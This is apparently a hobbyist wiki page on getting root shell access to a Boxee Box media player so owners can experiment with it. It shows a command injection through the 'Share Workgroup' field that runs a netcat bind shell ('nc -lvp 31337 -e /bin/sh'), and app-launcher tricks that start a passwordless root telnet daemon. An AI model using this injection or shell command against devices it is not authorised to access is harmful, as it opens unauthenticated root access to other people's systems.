Telnetd

Methods for starting raw sh shell (telnet like) latest firmware

#Get usb stick, and copy nc (netcat) from e.g backtrack to usb stick
#Plugin the USB stick into your boxee box

Any usb disk will mount automatically in /tmp/mnt/ID, but also have a symlink from /media/LABEL to the mount point.
ie: /media/My_pendrive -> /tmp/mnt/F56-A64-74R
You can use this symlink instead of the mountpoint, and skip the next 3 steps.

#You need to find out where it's mounted so go to http://yourboxeebox:8080
#Click Get latest logs, open the log file and view the "storage"
#Here you can see the usb drive beeing mounted to e.g /tmp/mnt/123-123
#Go to your boxee box settings/network and choose servers.
#Choose "Share Workgroup"
#Type in ;cp /tmp/mnt/123-123/nc /tmp;
#Go back out to the main settings menu again
#Go back in to the "Share Workgroup"
#Type /tmp/nc -lvp 31337 -e /bin/sh
#Go back, and the boxee will freeze. That means that it has executed nc, and waiting for netcat to end.
#In your backtrack, or windows or what you have, do
#nc yourboxeehost 31337
#You will see a blank prompt, try ls - al

bin
buildinfo
data
dev
download
etc
lib
linuxrc
media
mnt
opt
proc
sbin
share
sys
tmp
usr
var
version

#Done

Would like to Thank the original author of the command execution bug GTVHacker, thanks for a fun Defcon!
Br,
Acidgen
es.strasacul|maps#es.strasacul|maps

Methods for Starting Telnet

!!! Neither method seems to work in Firmware 1.0.1.16319 or higher !!!

UnBoxed App

#Add repository http://erikkristensen.com/boxee/
#Launch "UnBoxed" app.
#Click Start Telnet

#Add the UnBoxed Mirror to get a working version of the app without the notice. (The one above just says that it no longer works)
#Add repository http://infinityoverzero.com/bbox/rep/
#Launch "UnBoxed" app.

Launcher App (Method 2)

  1. Add repository dir.fuzzthed.com
  2. Start "Launcher" app.
  3. Create an application.

#* Name the application <tt>Start Telnet</tt>.
#* Link should be "/etc/init.d/telnetd start" - include the quotes.

  1. Create another application.

#* Name the application Stop Telnet.
#* Link should be "/etc/init.d/telnetd stop" - include the quotes.

Launching "Start Telnet" should allow you to telnet to the box - you should be automatically logged in as root with no password prompt.

Launching the applications appears to do nothing, but will start or stop the telnet daemon behind the scenes.

Caveats

Some display and formatting issues have been noticed with PuTTY, but "telnet" under Linux works fine. Use the "raw" mode in PuTTY and specify port 23 instead of using the "Telnet" default. This still has some display issues, but works well enough.

Issues

Normally we'd create a symlink in /dev/rc3.d/ to /etc/init.d/telnetd to start it on boot, but the root filesystem is read-only (on a rootfs filesystem). It can't be remounted read-write.

This does start (or stop) a root shell with no password. The root partition is read-only, but this could pose a security risk, depending on your network. You may want to stop the Telnet daemon (or reboot) when you're done experimenting.

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License